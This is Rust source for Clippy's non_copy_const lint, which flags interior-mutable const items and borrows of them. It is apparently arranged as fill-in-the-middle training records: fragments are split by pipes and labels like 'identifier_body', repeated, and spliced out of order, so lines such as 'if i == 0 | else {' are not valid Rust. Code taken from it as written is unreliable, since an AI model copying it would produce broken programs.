is_value_unfrozen_raw(cx, result, ty)
}
fn is_value_unfrozen_expr<'tcx>(cx: &LateContext<'tcx>, hir_id: HirId, def_id: DefId, ty: Ty<'tcx>) -> bool {
let substs = cx.typeck_results().node_substs(hir_id);
let result = cx.tcx.const_eval_resolve(
cx.param_env,
ty::Unevaluated::new(ty::WithOptConstParam::unknown(def_id), substs),
None,
);
is_value_unfrozen_raw(cx, result, ty)
}
#[derive(Copy, Clone)]
enum Source {
Item { item: Span },
Assoc { item: Span },
Expr { expr: Span },
}
impl Source {
#[must_use]
fn lint(&self) -> (&'static Lint, &'static str, Span) {
match self {
Self::Item { item } | Self::Assoc { item, .. } => (
DECLARE_INTERIOR_MUTABLE_CONST,
"a `const` item should never be interior mutable",
*item,
),
Self::Expr { expr } => (
BORROW_INTERIOR_MUTABLE_CONST,
"a `const` item with interior mutability should not be borrowed",
*expr,
),
}
}
}
fn lint(cx: &LateContext<'_>, source: Source) {
let (lint, msg, span) = source.lint();
span_lint_and_then(cx, lint, span, msg, |diag| {
if span.from_expansion() {
return; // Don't give suggestions into macros.
}
match source {
Source::Item { .. } => {
let const_kw_span = span.from_inner(InnerSpan::new(0, 5));
diag.span_label(const_kw_span, "make this a static item (maybe with lazy_static)");
},
Source::Assoc { .. } => (),
Source::Expr { .. } => {
diag.help("assign this const to a local or static variable, and use the variable here");
},
}
});
}
declare_lint_pass!(NonCopyConst => [DECLARE_INTERIOR_MUTABLE_CONST, BORROW_INTERIOR_MUTABLE_CONST]);
impl<'tcx> LateLintPass<'tcx> for NonCopyConst {
fn check_item(&mut self, cx: &LateContext<'tcx>, it: &'tcx Item<'_>) {
if let ItemKind::Const(hir_ty, body_id) = it.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, body_id, ty) {
lint(cx, Source::Item { item: it.span });
}
}
}
    /// Lints associated `const`s declared in trait definitions. When a default value is
    /// present, its evaluated value is checked too; otherwise the type alone decides.
    fn check_trait_item(&mut self, cx: &LateContext<'tcx>, trait_item: &'tcx TraitItem<'_>) {
        if let TraitItemKind::Const(hir_ty, body_id_opt) = &trait_item.kind {
            let ty = hir_ty_to_ty(cx.tcx, hir_ty);
            // Normalize assoc types because ones originated from generic params
            // bounded other traits could have their bound.
            let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
            if is_unfrozen(cx, normalized)
                // When there's no default value, lint it only according to its type;
                // in other words, lint consts whose value *could* be unfrozen, not definitely is.
                // This feels inconsistent with how the lint treats generic types,
                // which avoids linting types which potentially become unfrozen.
                // One could check whether an unfrozen type have a *frozen variant*
                // (like `body_id_opt.map_or_else(|| !has_frozen_variant(...), ...)`),
                // and do the same as the case of generic types at impl items.
                // Note that it isn't sufficient to check if it has an enum
                // since all of that enum's variants can be unfrozen:
                // i.e. having an enum doesn't necessary mean a type has a frozen variant.
                // And, implementing it isn't a trivial task; it'll probably end up
                // re-implementing the trait predicate evaluation specific to `Freeze`.
                && body_id_opt.map_or(true, |body_id| is_value_unfrozen_poly(cx, body_id, normalized))
            {
                lint(cx, Source::Assoc { item: trait_item.span });
            }
        }
    }
fn check_impl_item(&mut self, cx: &LateContext<'tcx>, impl_item: &'tcx ImplItem<'_>) |
    /// Lints direct borrows of interior mutable `const` items at their use sites.
    /// Climbs the expression tree to find what is actually borrowed (e.g. through
    /// field accesses) before deciding which type to inspect.
    fn check_expr(&mut self, cx: &LateContext<'tcx>, expr: &'tcx Expr<'_>) {
        if let ExprKind::Path(qpath) = &expr.kind {
            // Only lint if we use the const item inside a function.
            if in_constant(cx, expr.hir_id) {
                return;
            }
            // Make sure it is a const item.
            let item_def_id = match cx.qpath_res(qpath, expr.hir_id) {
                Res::Def(DefKind::Const | DefKind::AssocConst, did) => did,
                _ => return,
            };
            // Climb up to resolve any field access and explicit referencing.
            let mut cur_expr = expr;
            let mut dereferenced_expr = expr;
            let mut needs_check_adjustment = true;
            loop {
                let parent_id = cx.tcx.hir().get_parent_node(cur_expr.hir_id);
                if parent_id == cur_expr.hir_id {
                    // Reached the HIR root; stop climbing.
                    break;
                }
                if let Some(Node::Expr(parent_expr)) = cx.tcx.hir().find(parent_id) {
                    match &parent_expr.kind {
                        ExprKind::AddrOf(..) => {
                            // `&e` => `e` must be referenced.
                            needs_check_adjustment = false;
                        },
                        ExprKind::Field(..) => {
                            needs_check_adjustment = true;
                            // Check whether implicit dereferences happened;
                            // if so, no need to go further up
                            // because of the same reason as the `ExprKind::Unary` case.
                            if cx
                                .typeck_results()
                                .expr_adjustments(dereferenced_expr)
                                .iter()
                                .any(|adj| matches!(adj.kind, Adjust::Deref(_)))
                            {
                                break;
                            }
                            dereferenced_expr = parent_expr;
                        },
                        ExprKind::Index(e, _) if ptr::eq(&**e, cur_expr) => {
                            // `e[i]` => desugared to `*Index::index(&e, i)`,
                            // meaning `e` must be referenced.
                            // no need to go further up since a method call is involved now.
                            needs_check_adjustment = false;
                            break;
                        },
                        ExprKind::Unary(UnOp::Deref, _) => {
                            // `*e` => desugared to `*Deref::deref(&e)`,
                            // meaning `e` must be referenced.
                            // no need to go further up since a method call is involved now.
                            needs_check_adjustment = false;
                            break;
                        },
                        _ => break,
                    }
                    cur_expr = parent_expr;
                } else {
                    break;
                }
            }
            let ty = if needs_check_adjustment {
                let adjustments = cx.typeck_results().expr_adjustments(dereferenced_expr);
                if let Some(i) = adjustments
                    .iter()
                    .position(|adj| matches!(adj.kind, Adjust::Borrow(_) | Adjust::Deref(_)))
                {
                    if i == 0 {
                        cx.typeck_results().expr_ty(dereferenced_expr)
                    } else {
                        // The type right before the first borrow/deref adjustment is what
                        // actually gets borrowed.
                        adjustments[i - 1].target
                    }
                } else {
                    // No borrow adjustments means the entire const is moved.
                    return;
                }
            } else {
                cx.typeck_results().expr_ty(dereferenced_expr)
            };
            if is_unfrozen(cx, ty) && is_value_unfrozen_expr(cx, expr.hir_id, item_def_id, ty) {
                lint(cx, Source::Expr { expr: expr.span });
            }
        }
    }
| {
if let ImplItemKind::Const(hir_ty, body_id) = &impl_item.kind {
let item_hir_id = cx.tcx.hir().get_parent_node(impl_item.hir_id());
let item = cx.tcx.hir().expect_item(item_hir_id);
match &item.kind {
ItemKind::Impl(Impl {
of_trait: Some(of_trait_ref),
..
}) => {
if_chain! {
// Lint a trait impl item only when the definition is a generic type,
// assuming an assoc const is not meant to be an interior mutable type.
if let Some(of_trait_def_id) = of_trait_ref.trait_def_id();
if let Some(of_assoc_item) = specialization_graph::Node::Trait(of_trait_def_id)
.item(cx.tcx, impl_item.ident, AssocKind::Const, of_trait_def_id);
if cx
.tcx
.layout_of(cx.tcx.param_env(of_trait_def_id).and(
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound at the trait defs;
// and, in that case, the definition is *not* generic.
cx.tcx.normalize_erasing_regions(
cx.tcx.param_env(of_trait_def_id),
cx.tcx.type_of(of_assoc_item.def_id),
),
))
.is_err();
// If there were a function like `has_frozen_variant` described above,
// we should use here as a frozen variant is a potential to be frozen
// similar to unknown layouts.
// e.g. `layout_of(...).is_err() || has_frozen_variant(...);`
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized);
if is_value_unfrozen_poly(cx, *body_id, normalized);
then {
lint(
cx,
Source::Assoc {
item: impl_item.span,
},
);
}
}
},
ItemKind::Impl(Impl { of_trait: None, .. }) => {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types originated from generic params.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, *body_id, normalized) {
lint(cx, Source::Assoc { item: impl_item.span });
}
},
_ => (),
}
}
} | identifier_body |
non_copy_const.rs | //! Checks for uses of `const` items whose type is not `Freeze` (`Cell`-free).
//!
//! This lint is **warn** by default.
use std::ptr;
use clippy_utils::diagnostics::span_lint_and_then;
use clippy_utils::in_constant;
use if_chain::if_chain;
use rustc_hir::def::{DefKind, Res};
use rustc_hir::def_id::DefId;
use rustc_hir::{
BodyId, Expr, ExprKind, HirId, Impl, ImplItem, ImplItemKind, Item, ItemKind, Node, TraitItem, TraitItemKind, UnOp,
};
use rustc_infer::traits::specialization_graph;
use rustc_lint::{LateContext, LateLintPass, Lint};
use rustc_middle::mir::interpret::{ConstValue, ErrorHandled};
use rustc_middle::ty::adjustment::Adjust;
use rustc_middle::ty::{self, AssocKind, Const, Ty};
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::{InnerSpan, Span, DUMMY_SP};
use rustc_typeck::hir_ty_to_ty;
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
    /// ### What it does
    /// Checks for declaration of `const` items which are interior
    /// mutable (e.g., contain a `Cell`, `Mutex`, `AtomicXxxx`, etc.).
    ///
    /// ### Why is this bad?
    /// Consts are copied everywhere they are referenced, i.e.,
    /// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
    /// or `AtomicXxxx` will be created, which defeats the whole purpose of using
    /// these types in the first place.
    ///
    /// The `const` should better be replaced by a `static` item if a global
    /// variable is wanted, or replaced by a `const fn` if a constructor is wanted.
    ///
    /// ### Known problems
    /// A "non-constant" const item is a legacy way to supply an
    /// initialized value to downstream `static` items (e.g., the
    /// `std::sync::ONCE_INIT` constant). In this case the use of `const` is legit,
    /// and this lint should be suppressed.
    ///
    /// Even though the lint avoids triggering on a constant whose type has enums that have variants
    /// with interior mutability, and its value uses non interior mutable variants (see
    /// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962) and
    /// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825) for examples);
    /// it complains about associated constants without default values only based on its types;
    /// which might not be preferable.
    /// There're other enums plus associated constants cases that the lint cannot handle.
    ///
    /// Types that have underlying or potential interior mutability trigger the lint whether
    /// the interior mutable field is used or not. See issues
    /// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
    /// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825)
    ///
    /// ### Example
    /// ```rust
    /// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
    ///
    /// // Bad.
    /// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
    /// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
    /// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
    ///
    /// // Good.
    /// static STATIC_ATOM: AtomicUsize = AtomicUsize::new(15);
    /// STATIC_ATOM.store(9, SeqCst);
    /// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
    /// ```
    #[clippy::version = "pre 1.29.0"]
    pub DECLARE_INTERIOR_MUTABLE_CONST,
    style,
    "declaring `const` with interior mutability"
}
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
    /// ### What it does
    /// Checks if `const` items which are interior mutable (e.g.,
    /// contain a `Cell`, `Mutex`, `AtomicXxxx`, etc.) have been borrowed directly.
    ///
    /// ### Why is this bad?
    /// Consts are copied everywhere they are referenced, i.e.,
    /// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
    /// or `AtomicXxxx` will be created, which defeats the whole purpose of using
    /// these types in the first place.
    ///
    /// The `const` value should be stored inside a `static` item.
    ///
    /// ### Known problems
    /// When an enum has variants with interior mutability, use of its non
    /// interior mutable variants can generate false positives. See issue
    /// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962)
    ///
    /// Types that have underlying or potential interior mutability trigger the lint whether
    /// the interior mutable field is used or not. See issues
    /// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
    /// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825)
    ///
    /// ### Example
    /// ```rust
    /// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
    /// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
    ///
    /// // Bad.
    /// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
    /// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
    ///
    /// // Good.
    /// static STATIC_ATOM: AtomicUsize = CONST_ATOM;
    /// STATIC_ATOM.store(9, SeqCst);
    /// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
    /// ```
    #[clippy::version = "pre 1.29.0"]
    pub BORROW_INTERIOR_MUTABLE_CONST,
    style,
    "referencing `const` with interior mutability"
}
/// Tells whether `ty` itself is interior mutable: its layout is computable
/// (i.e. it is not generic in a way that defeats the check) and it is not `Freeze`.
fn is_unfrozen<'tcx>(cx: &LateContext<'tcx>, ty: Ty<'tcx>) -> bool {
    // Ignore types whose layout is unknown since `is_freeze` reports every generic types as `!Freeze`,
    // making it indistinguishable from `UnsafeCell`. i.e. it isn't a tool to prove a type is
    // 'unfrozen'. However, this code causes a false negative in which
    // a type contains a layout-unknown type, but also an unsafe cell like `const CELL: Cell<T>`.
    // Yet, it's better than `ty.has_type_flags(TypeFlags::HAS_TY_PARAM | TypeFlags::HAS_PROJECTION)`
    // since it works when a pointer indirection involves (`Cell<*const T>`).
    // Making up a `ParamEnv` where every generic params and assoc types are `Freeze` is another option;
    // but I'm not sure whether it's a decent way, if possible.
    cx.tcx.layout_of(cx.param_env.and(ty)).is_ok() && !ty.is_freeze(cx.tcx.at(DUMMY_SP), cx.param_env)
}
/// Tells whether an evaluated constant *value* is unfrozen, i.e. actually
/// contains an `UnsafeCell`, by recursively destructuring the value.
/// Evaluation errors are treated per the comment inside (`TooGeneric` counts as unfrozen).
fn is_value_unfrozen_raw<'tcx>(
    cx: &LateContext<'tcx>,
    result: Result<ConstValue<'tcx>, ErrorHandled>,
    ty: Ty<'tcx>,
) -> bool {
    // Recursively digs through structs/arrays/tuples looking for an `UnsafeCell`.
    fn inner<'tcx>(cx: &LateContext<'tcx>, val: &'tcx Const<'tcx>) -> bool {
        match val.ty.kind() {
            // the fact that we have to dig into every structs to search enums
            // leads us to the point checking `UnsafeCell` directly is the only option.
            ty::Adt(ty_def, ..) if Some(ty_def.did) == cx.tcx.lang_items().unsafe_cell_type() => true,
            ty::Array(..) | ty::Adt(..) | ty::Tuple(..) => {
                let val = cx.tcx.destructure_const(cx.param_env.and(val));
                val.fields.iter().any(|field| inner(cx, field))
            },
            _ => false,
        }
    }
    result.map_or_else(
        |err| {
            // Consider `TooGeneric` cases as being unfrozen.
            // This causes a false positive where an assoc const whose type is unfrozen
            // have a value that is a frozen variant with a generic param (an example is
            // `declare_interior_mutable_const::enums::BothOfCellAndGeneric::GENERIC_VARIANT`).
            // However, it prevents a number of false negatives that is, I think, important:
            // 1. assoc consts in trait defs referring to consts of themselves
            // (an example is `declare_interior_mutable_const::traits::ConcreteTypes::ANOTHER_ATOMIC`).
            // 2. a path expr referring to assoc consts whose type is doesn't have
            // any frozen variants in trait defs (i.e. without substitute for `Self`).
            // (e.g. borrowing `borrow_interior_mutable_const::trait::ConcreteTypes::ATOMIC`)
            // 3. similar to the false positive above;
            // but the value is an unfrozen variant, or the type has no enums. (An example is
            // `declare_interior_mutable_const::enums::BothOfCellAndGeneric::UNFROZEN_VARIANT`
            // and `declare_interior_mutable_const::enums::BothOfCellAndGeneric::NO_ENUM`).
            // One might be able to prevent these FNs correctly, and replace this with `false`;
            // e.g. implementing `has_frozen_variant` described above, and not running this function
            // when the type doesn't have any frozen variants would be the 'correct' way for the 2nd
            // case (that actually removes another suboptimal behavior (I won't say 'false positive') where,
            // similar to 2., but with the a frozen variant) (e.g. borrowing
            // `borrow_interior_mutable_const::enums::AssocConsts::TO_BE_FROZEN_VARIANT`).
            // I chose this way because unfrozen enums as assoc consts are rare (or, hopefully, none).
            err == ErrorHandled::TooGeneric
        },
        |val| inner(cx, Const::from_value(cx.tcx, val, ty)),
    )
}
/// Evaluates the const body identified by `body_id` polymorphically (no
/// substitutions) and checks whether the resulting value is unfrozen.
fn is_value_unfrozen_poly<'tcx>(cx: &LateContext<'tcx>, body_id: BodyId, ty: Ty<'tcx>) -> bool {
    let owner_def_id = body_id.hir_id.owner.to_def_id();
    is_value_unfrozen_raw(cx, cx.tcx.const_eval_poly(owner_def_id), ty)
}
/// Evaluates the const referenced at `hir_id`, resolving its substitutions at
/// the use site, and checks whether the resulting value is unfrozen.
fn is_value_unfrozen_expr<'tcx>(cx: &LateContext<'tcx>, hir_id: HirId, def_id: DefId, ty: Ty<'tcx>) -> bool {
    let substs = cx.typeck_results().node_substs(hir_id);
    let unevaluated = ty::Unevaluated::new(ty::WithOptConstParam::unknown(def_id), substs);
    let result = cx.tcx.const_eval_resolve(cx.param_env, unevaluated, None);
    is_value_unfrozen_raw(cx, result, ty)
}
/// Where an interior mutable `const` was found, carrying the span to lint.
#[derive(Copy, Clone)]
enum Source {
    /// A free-standing `const` item.
    Item { item: Span },
    /// An associated `const` in a trait definition or an impl block.
    Assoc { item: Span },
    /// An expression borrowing an interior mutable `const`.
    Expr { expr: Span },
}
impl Source {
    /// Resolves which lint applies to this source, together with its message and span.
    #[must_use]
    fn lint(&self) -> (&'static Lint, &'static str, Span) {
        match *self {
            Self::Expr { expr } => (
                BORROW_INTERIOR_MUTABLE_CONST,
                "a `const` item with interior mutability should not be borrowed",
                expr,
            ),
            Self::Item { item } | Self::Assoc { item, .. } => (
                DECLARE_INTERIOR_MUTABLE_CONST,
                "a `const` item should never be interior mutable",
                item,
            ),
        }
    }
}
/// Emits the lint selected by `source`, attaching a fix suggestion when the
/// span does not originate from a macro expansion.
fn lint(cx: &LateContext<'_>, source: Source) {
    let (lint, msg, span) = source.lint();
    span_lint_and_then(cx, lint, span, msg, |diag| {
        // Don't give suggestions into macros.
        if span.from_expansion() {
            return;
        }
        if let Source::Item { .. } = source {
            // The `const` keyword occupies the first five bytes of the item's span.
            let const_kw_span = span.from_inner(InnerSpan::new(0, 5));
            diag.span_label(const_kw_span, "make this a static item (maybe with lazy_static)");
        } else if let Source::Expr { .. } = source {
            diag.help("assign this const to a local or static variable, and use the variable here");
        }
        // `Source::Assoc` gets no extra suggestion.
    });
}
// Single lint pass driving both interior-mutable-const lints.
declare_lint_pass!(NonCopyConst => [DECLARE_INTERIOR_MUTABLE_CONST, BORROW_INTERIOR_MUTABLE_CONST]);
impl<'tcx> LateLintPass<'tcx> for NonCopyConst {
fn check_item(&mut self, cx: &LateContext<'tcx>, it: &'tcx Item<'_>) {
if let ItemKind::Const(hir_ty, body_id) = it.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, body_id, ty) {
lint(cx, Source::Item { item: it.span });
}
}
}
    /// Lints associated `const`s declared in trait definitions. When a default value is
    /// present, its evaluated value is checked too; otherwise the type alone decides.
    fn check_trait_item(&mut self, cx: &LateContext<'tcx>, trait_item: &'tcx TraitItem<'_>) {
        if let TraitItemKind::Const(hir_ty, body_id_opt) = &trait_item.kind {
            let ty = hir_ty_to_ty(cx.tcx, hir_ty);
            // Normalize assoc types because ones originated from generic params
            // bounded other traits could have their bound.
            let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
            if is_unfrozen(cx, normalized)
                // When there's no default value, lint it only according to its type;
                // in other words, lint consts whose value *could* be unfrozen, not definitely is.
                // This feels inconsistent with how the lint treats generic types,
                // which avoids linting types which potentially become unfrozen.
                // One could check whether an unfrozen type have a *frozen variant*
                // (like `body_id_opt.map_or_else(|| !has_frozen_variant(...), ...)`),
                // and do the same as the case of generic types at impl items.
                // Note that it isn't sufficient to check if it has an enum
                // since all of that enum's variants can be unfrozen:
                // i.e. having an enum doesn't necessary mean a type has a frozen variant.
                // And, implementing it isn't a trivial task; it'll probably end up
                // re-implementing the trait predicate evaluation specific to `Freeze`.
                && body_id_opt.map_or(true, |body_id| is_value_unfrozen_poly(cx, body_id, normalized))
            {
                lint(cx, Source::Assoc { item: trait_item.span });
            }
        }
    }
fn check_impl_item(&mut self, cx: &LateContext<'tcx>, impl_item: &'tcx ImplItem<'_>) {
if let ImplItemKind::Const(hir_ty, body_id) = &impl_item.kind {
let item_hir_id = cx.tcx.hir().get_parent_node(impl_item.hir_id());
let item = cx.tcx.hir().expect_item(item_hir_id);
match &item.kind {
ItemKind::Impl(Impl {
of_trait: Some(of_trait_ref),
..
}) => {
if_chain! {
// Lint a trait impl item only when the definition is a generic type,
// assuming an assoc const is not meant to be an interior mutable type.
if let Some(of_trait_def_id) = of_trait_ref.trait_def_id();
if let Some(of_assoc_item) = specialization_graph::Node::Trait(of_trait_def_id)
.item(cx.tcx, impl_item.ident, AssocKind::Const, of_trait_def_id);
if cx
.tcx
.layout_of(cx.tcx.param_env(of_trait_def_id).and(
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound at the trait defs;
// and, in that case, the definition is *not* generic.
cx.tcx.normalize_erasing_regions(
cx.tcx.param_env(of_trait_def_id),
cx.tcx.type_of(of_assoc_item.def_id),
),
))
.is_err();
// If there were a function like `has_frozen_variant` described above,
// we should use here as a frozen variant is a potential to be frozen
// similar to unknown layouts.
// e.g. `layout_of(...).is_err() || has_frozen_variant(...);`
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized);
if is_value_unfrozen_poly(cx, *body_id, normalized);
then {
lint(
cx,
Source::Assoc {
item: impl_item.span,
},
);
}
}
},
ItemKind::Impl(Impl { of_trait: None, .. }) => {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types originated from generic params.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, *body_id, normalized) {
lint(cx, Source::Assoc { item: impl_item.span });
}
},
_ => (),
}
}
}
fn check_expr(&mut self, cx: &LateContext<'tcx>, expr: &'tcx Expr<'_>) {
if let ExprKind::Path(qpath) = &expr.kind {
// Only lint if we use the const item inside a function.
if in_constant(cx, expr.hir_id) {
return;
}
// Make sure it is a const item.
let item_def_id = match cx.qpath_res(qpath, expr.hir_id) {
Res::Def(DefKind::Const | DefKind::AssocConst, did) => did,
_ => return,
};
// Climb up to resolve any field access and explicit referencing.
let mut cur_expr = expr;
let mut dereferenced_expr = expr;
let mut needs_check_adjustment = true;
loop {
let parent_id = cx.tcx.hir().get_parent_node(cur_expr.hir_id);
if parent_id == cur_expr.hir_id {
break;
}
if let Some(Node::Expr(parent_expr)) = cx.tcx.hir().find(parent_id) {
match &parent_expr.kind {
ExprKind::AddrOf(..) => {
// `&e` => `e` must be referenced.
needs_check_adjustment = false;
},
ExprKind::Field(..) => {
needs_check_adjustment = true;
// Check whether implicit dereferences happened;
// if so, no need to go further up
// because of the same reason as the `ExprKind::Unary` case.
if cx
.typeck_results()
.expr_adjustments(dereferenced_expr)
.iter()
.any(|adj| matches!(adj.kind, Adjust::Deref(_)))
{
break;
}
dereferenced_expr = parent_expr;
},
ExprKind::Index(e, _) if ptr::eq(&**e, cur_expr) => {
// `e[i]` => desugared to `*Index::index(&e, i)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
ExprKind::Unary(UnOp::Deref, _) => {
// `*e` => desugared to `*Deref::deref(&e)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
_ => break,
}
cur_expr = parent_expr;
} else {
break;
}
}
let ty = if needs_check_adjustment {
let adjustments = cx.typeck_results().expr_adjustments(dereferenced_expr);
if let Some(i) = adjustments
.iter()
.position(|adj| matches!(adj.kind, Adjust::Borrow(_) | Adjust::Deref(_)))
{
if i == 0 | else {
adjustments[i - 1].target
}
} else {
// No borrow adjustments means the entire const is moved.
return;
}
} else {
cx.typeck_results().expr_ty(dereferenced_expr)
};
if is_unfrozen(cx, ty) && is_value_unfrozen_expr(cx, expr.hir_id, item_def_id, ty) {
lint(cx, Source::Expr { expr: expr.span });
}
}
}
}
| {
cx.typeck_results().expr_ty(dereferenced_expr)
} | conditional_block |
non_copy_const.rs | //! Checks for uses of `const` items whose type is not `Freeze` (`Cell`-free).
//!
//! This lint is **warn** by default.
use std::ptr;
use clippy_utils::diagnostics::span_lint_and_then;
use clippy_utils::in_constant;
use if_chain::if_chain;
use rustc_hir::def::{DefKind, Res};
use rustc_hir::def_id::DefId;
use rustc_hir::{
BodyId, Expr, ExprKind, HirId, Impl, ImplItem, ImplItemKind, Item, ItemKind, Node, TraitItem, TraitItemKind, UnOp,
};
use rustc_infer::traits::specialization_graph;
use rustc_lint::{LateContext, LateLintPass, Lint};
use rustc_middle::mir::interpret::{ConstValue, ErrorHandled};
use rustc_middle::ty::adjustment::Adjust;
use rustc_middle::ty::{self, AssocKind, Const, Ty};
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::{InnerSpan, Span, DUMMY_SP};
use rustc_typeck::hir_ty_to_ty;
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
    /// ### What it does
    /// Checks for declaration of `const` items which are interior
    /// mutable (e.g., contain a `Cell`, `Mutex`, `AtomicXxxx`, etc.).
    ///
    /// ### Why is this bad?
    /// Consts are copied everywhere they are referenced, i.e.,
    /// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
    /// or `AtomicXxxx` will be created, which defeats the whole purpose of using
    /// these types in the first place.
    ///
    /// The `const` should better be replaced by a `static` item if a global
    /// variable is wanted, or replaced by a `const fn` if a constructor is wanted.
    ///
    /// ### Known problems
    /// A "non-constant" const item is a legacy way to supply an
    /// initialized value to downstream `static` items (e.g., the
    /// `std::sync::ONCE_INIT` constant). In this case the use of `const` is legit,
    /// and this lint should be suppressed.
    ///
    /// Even though the lint avoids triggering on a constant whose type has enums that have variants
    /// with interior mutability, and its value uses non interior mutable variants (see
    /// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962) and
    /// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825) for examples);
    /// it complains about associated constants without default values only based on its types;
    /// which might not be preferable.
    /// There're other enums plus associated constants cases that the lint cannot handle.
    ///
    /// Types that have underlying or potential interior mutability trigger the lint whether
    /// the interior mutable field is used or not. See issues
    /// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
    /// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825)
    ///
    /// ### Example
    /// ```rust
    /// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
    ///
    /// // Bad.
    /// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
    /// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
    /// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
    ///
    /// // Good.
    /// static STATIC_ATOM: AtomicUsize = AtomicUsize::new(15);
    /// STATIC_ATOM.store(9, SeqCst);
    /// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
    /// ```
    #[clippy::version = "pre 1.29.0"]
    pub DECLARE_INTERIOR_MUTABLE_CONST,
    style,
    "declaring `const` with interior mutability"
}
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
    /// ### What it does
    /// Checks if `const` items which are interior mutable (e.g.,
    /// contain a `Cell`, `Mutex`, `AtomicXxxx`, etc.) have been borrowed directly.
    ///
    /// ### Why is this bad?
    /// Consts are copied everywhere they are referenced, i.e.,
    /// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
    /// or `AtomicXxxx` will be created, which defeats the whole purpose of using
    /// these types in the first place.
    ///
    /// The `const` value should be stored inside a `static` item.
    ///
    /// ### Known problems
    /// When an enum has variants with interior mutability, use of its non
    /// interior mutable variants can generate false positives. See issue
    /// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962)
    ///
    /// Types that have underlying or potential interior mutability trigger the lint whether
    /// the interior mutable field is used or not. See issues
    /// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
    /// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825)
    ///
    /// ### Example
    /// ```rust
    /// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
    /// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
    ///
    /// // Bad.
    /// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
    /// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
    ///
    /// // Good.
    /// static STATIC_ATOM: AtomicUsize = CONST_ATOM;
    /// STATIC_ATOM.store(9, SeqCst);
    /// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
    /// ```
    #[clippy::version = "pre 1.29.0"]
    pub BORROW_INTERIOR_MUTABLE_CONST,
    style,
    "referencing `const` with interior mutability"
}
fn | <'tcx>(cx: &LateContext<'tcx>, ty: Ty<'tcx>) -> bool {
// Ignore types whose layout is unknown since `is_freeze` reports every generic types as `!Freeze`,
// making it indistinguishable from `UnsafeCell`. i.e. it isn't a tool to prove a type is
// 'unfrozen'. However, this code causes a false negative in which
// a type contains a layout-unknown type, but also an unsafe cell like `const CELL: Cell<T>`.
// Yet, it's better than `ty.has_type_flags(TypeFlags::HAS_TY_PARAM | TypeFlags::HAS_PROJECTION)`
// since it works when a pointer indirection involves (`Cell<*const T>`).
// Making up a `ParamEnv` where every generic params and assoc types are `Freeze`is another option;
// but I'm not sure whether it's a decent way, if possible.
cx.tcx.layout_of(cx.param_env.and(ty)).is_ok() && !ty.is_freeze(cx.tcx.at(DUMMY_SP), cx.param_env)
}
/// Tells whether an evaluated constant *value* is unfrozen, i.e. actually
